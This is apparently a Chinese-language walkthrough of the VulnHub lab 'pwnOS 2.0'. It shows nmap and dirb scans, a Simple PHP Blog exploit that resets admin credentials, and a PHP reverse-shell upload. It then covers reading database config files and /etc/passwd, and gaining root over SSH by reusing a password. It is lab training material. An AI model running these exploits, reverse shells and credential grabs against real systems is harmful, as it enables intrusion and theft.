PWNOS: 2.0 (PRE-RELEASE)
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
主机发现
# yunki @ yunki in ~ [9:45:32]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.7
Host is up (0.00029s latency).
扫描端口
# yunki @ yunki in ~ [9:48:40]
$ sudo nmap --min-rate 10000 -p- 192.168.54.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 09:49 CST
Nmap scan report for 192.168.54.7
Host is up (0.00099s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:65:84:D7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.97 seconds
TCP扫描
# yunki @ yunki in ~ [9:49:35]
$ sudo nmap -sT -sV -p22,80 192.168.54.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:65:84:D7 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
UDP扫描
# yunki @ yunki in ~ [9:50:22]
$ sudo nmap -sU -O -p22,80 192.168.54.7
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:65:84:D7 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
脚本扫描
# yunki @ yunki in ~ [9:50:22]
$ sudo nmap -sU -O -p22,80 192.168.54.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 09:51 CST
Nmap scan report for 192.168.54.7
Host is up (0.00076s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:65:84:D7 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
# yunki @ yunki in ~ [9:51:14]
$ sudo nmap --script=vuln -p22,80 192.168.54.7
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
| httponly flag not set
| /login/:
| PHPSESSID:
| httponly flag not set
| /index/:
| PHPSESSID:
| httponly flag not set
| /register/:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
| /blog/: Blog
| /login.php: Possible admin folder
| /login/: Login page
| /info.php: Possible information file
| /icons/: Potentially interesting folder w/ directory listing
| /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
| /index/: Potentially interesting folder
| /info/: Potentially interesting folder
|_ /register/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.7
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.54.7:80/login.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.54.7:80/register.php
| Form id:
|_ Form action: register.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:65:84:D7 (VMware)
web渗透
尝试sql注入登录
被拦截了。
# yunki @ yunki in ~ [9:56:57]
$ dirb http://192.168.54.7
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 14 09:57:06 2023
URL_BASE: http://192.168.54.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.7/ ----
+ http://192.168.54.7/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/
+ http://192.168.54.7/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://192.168.54.7/includes/
+ http://192.168.54.7/index (CODE:200|SIZE:854)
+ http://192.168.54.7/index.php (CODE:200|SIZE:854)
+ http://192.168.54.7/info (CODE:200|SIZE:50179)
+ http://192.168.54.7/info.php (CODE:200|SIZE:50048)
+ http://192.168.54.7/login (CODE:200|SIZE:1174)
+ http://192.168.54.7/register (CODE:200|SIZE:1562)
+ http://192.168.54.7/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.54.7/blog/ ----
+ http://192.168.54.7/blog/add (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/atom (CODE:200|SIZE:1062)
+ http://192.168.54.7/blog/categories (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/config/
+ http://192.168.54.7/blog/contact (CODE:200|SIZE:5922)
==> DIRECTORY: http://192.168.54.7/blog/content/
+ http://192.168.54.7/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/docs/
==> DIRECTORY: http://192.168.54.7/blog/flash/
==> DIRECTORY: http://192.168.54.7/blog/images/
+ http://192.168.54.7/blog/index (CODE:200|SIZE:8094)
+ http://192.168.54.7/blog/index.php (CODE:200|SIZE:8094)
+ http://192.168.54.7/blog/info (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/interface/
==> DIRECTORY: http://192.168.54.7/blog/languages/
+ http://192.168.54.7/blog/login (CODE:200|SIZE:5671)
+ http://192.168.54.7/blog/logout (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/options (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/rdf (CODE:200|SIZE:1411)
+ http://192.168.54.7/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://192.168.54.7/blog/scripts/
+ http://192.168.54.7/blog/search (CODE:200|SIZE:4955)
+ http://192.168.54.7/blog/setup (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/static (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/stats (CODE:200|SIZE:5313)
==> DIRECTORY: http://192.168.54.7/blog/themes/
+ http://192.168.54.7/blog/trackback (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/upgrade (CODE:302|SIZE:0)
扫描到了blog目录,去看看http://192.168.54.7/blog
一般看到blog等界面,会想到去查看该cms的信息,于是查看源代码,发现
用searchsploit
搜一下
# yunki @ yunki in ~ [10:04:02]
$ searchsploit simple php blog 0.4.0
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# yunki @ yunki in ~/vulnhub [10:05:46]
$ searchsploit -m 1191
Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
URL: https://www.exploit-db.com/exploits/1191
Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
File Type: Perl script text executable
通过阅读1191文件,使用一下。创建个新用户吧。
┌──(root💀yunki)-[/home/yunki/vulnhub/pwnos2]
└─# perl 1191.pl -h http://192.168.54.7/blog/ -e 3 -U yunki -P yunki
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: yunki
Password is set to: yunki
*** Exploit Completed....
Have a nice day! :)
去登录。登录成功。找到个可以上传的地方。
获得初始shell
试试能不能上传php文件,结果可以。于是上传一个php反弹shell。
cp /usr/share/laudanum/php/php-reverse-shell.php .
# 修改ip和端口,同时开启监听。
上传之后,得访问该页面,所以,在之前的目录扫描中可以看到,该文件在/images/下,直接访问:http://192.168.54.7/blog/images/shell.php
提权
# dpkg -l # 查看是否安装python ,提高交互
$ python -c "import pty;pty.spawn('/bin/bash')"
# 由于该cms是一个blog,所以一定有数据库文件,去到web目录下,搜索mysql文件。
www-data@web:/$ cd /var/www
cd /var/www
www-data@web:/var/www$ ls
ls
activate.php includes info.php mysqli_connect.php
blog index.php login.php register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
# 尝试登录,居然不对
?>www-data@web:/var/www$ mysql -uroot -pgooday
mysql -uroot -pgooday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
奇怪的是,该系统稳定运行,居然mysqlq不对,说明有其他mysql文件,这里继续查找
www-data@web:/var/www$ find / -name "mysqli_connect.php" 2>/dev/null
find / -name "mysqli_connect.php" 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.1.54-1ubuntu4 (Ubuntu)
Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
查看数据库内容
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ch16 |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users |
+----------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email | pass | user_level | active | registration_date |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| 1 | Dan | Privett | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)
去解析该密码。
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
获得了密码,这里的用户只有dan,所以我们尝试ssh登录。
ssh dan@192.168.54.7 # killerbeesareflying 不对
ssh admin@192.168.54.7 # killerbeesareflying 不对
ssh Privett@192.168.54.7 # killerbeesareflying 不对
ssh isints@192.168.54.7 # killerbeesareflying 不对
都不对,那试试之前那两个mysql的密码,试试密码碰撞?
ssh root@192.168.54.7 # goodday 不对
ssh root@192.168.54.7 # root@ISIntS 成功!